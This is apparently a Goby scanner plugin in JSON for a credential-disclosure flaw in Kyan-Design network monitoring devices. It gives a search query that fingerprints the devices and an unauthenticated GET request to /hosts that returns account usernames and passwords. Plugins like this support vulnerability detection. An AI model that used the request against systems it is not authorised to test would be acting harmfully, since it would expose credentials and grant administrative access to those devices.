{ "Name": "Kyan design account password disclosure", "Level": "1", "Tags": [ "Disclosure of Sensitive Information" ], "GobyQuery": "app=\"Kyan-Design\"", "Description": "Kyan network monitoring device has an account password leakage vulnerability, through which the attacker can obtain the account password and background permissions", "Product": "Kyan-Design", "Homepage": "https://kyan.com/", "Author": "PeiQi", "Impact": "

through which the attacker can obtain the account password and background permissions

", "Recommandation": "", "References": [ "http://wiki.peiqi.tech" ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/hosts", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Password", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "UserName", "bz": "" } ] }, "SetVariable": [] } ], "PostTime": "2021-04-15 21:11:09", "GobyVersion": "1.8.258" }